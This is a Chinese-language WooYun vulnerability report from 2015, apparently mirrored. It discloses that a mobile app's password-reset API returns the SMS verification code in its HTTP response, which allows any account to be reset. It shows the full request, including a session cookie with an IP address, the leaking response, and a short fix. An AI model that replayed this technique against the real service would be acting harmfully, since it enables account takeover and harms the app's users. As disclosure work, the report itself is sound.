乌云(WooYun.org)历史漏洞查询---http://wy.zone.ci/
乌云 Drops 文章在线浏览--------http://drop.zone.ci/
2015-04-20: 积极联系厂商并且等待厂商认领中,细节不对外公开 2015-06-04: 厂商已经主动忽略漏洞,细节向公众公开
RT
补充下:问题存在于密码找回功能中,验证码写在了返回包里,所以可以重置任意账户的
POST /api/index HTTP/1.1Host: yppapi.wanyoo.comProxy-Connection: closeAccept-Encoding: gzipContent-Type: application/x-www-form-urlencoded; charset=utf-8Content-Length: 279Connection: closeCookie: ci_session=a%3A5%3A%7Bs%3A10%3A%22session_id%22%3Bs%3A32%3A%22f10d8f4538db2ab59ed4ffa1bc8f9a3a%22%3Bs%3A10%3A%22ip_address%22%3Bs%3A15%3A%22183.129.152.142%22%3Bs%3A10%3A%22user_agent%22%3Bs%3A55%3A%22%E9%B1%BC%E6%B3%A1%E6%B3%A1+2.1+rv%3A2.1.3+%28iPhone%3B+iPhone+OS+6.1.2%3B+en_US%29%22%3Bs%3A13%3A%22last_activity%22%3Bi%3A1428372131%3Bs%3A9%3A%22user_data%22%3Bs%3A0%3A%22%22%3B%7De8c2af02f83a6b622bd193830dd06b45User-Agent: 鱼泡泡 2.1 rv:2.1.3 (iPhone; iPhone OS 6.1.2; en_US)screen=640%2A960&device_model=iphone&signature=1acc1833fd225f81d57f90e67195172baa94c131&sys_version=7.1.2&request=xxxx&method=SendVericode&soft_version=1.0&platform=ios×pan=1428374163689
上面是请求包我们主要看返回包
HTTP/1.1 200 OKServer: nginxDate: Tue, 07 Apr 2015 02:36:52 GMTContent-Type: text/htmlConnection: closeVary: Accept-EncodingX-Powered-By: PHP/5.3.28Content-Length: 113{"code":"8000","result":{"vericode":"6164","send_channel":"106550251961906666","match_str":"\u9c7c\u6ce1\u6ce1"}}
holy shit!! vericode 写在返回包!!!天~
修改Model中对用操作 去除不必要的json返回
未能联系到厂商或者厂商积极拒绝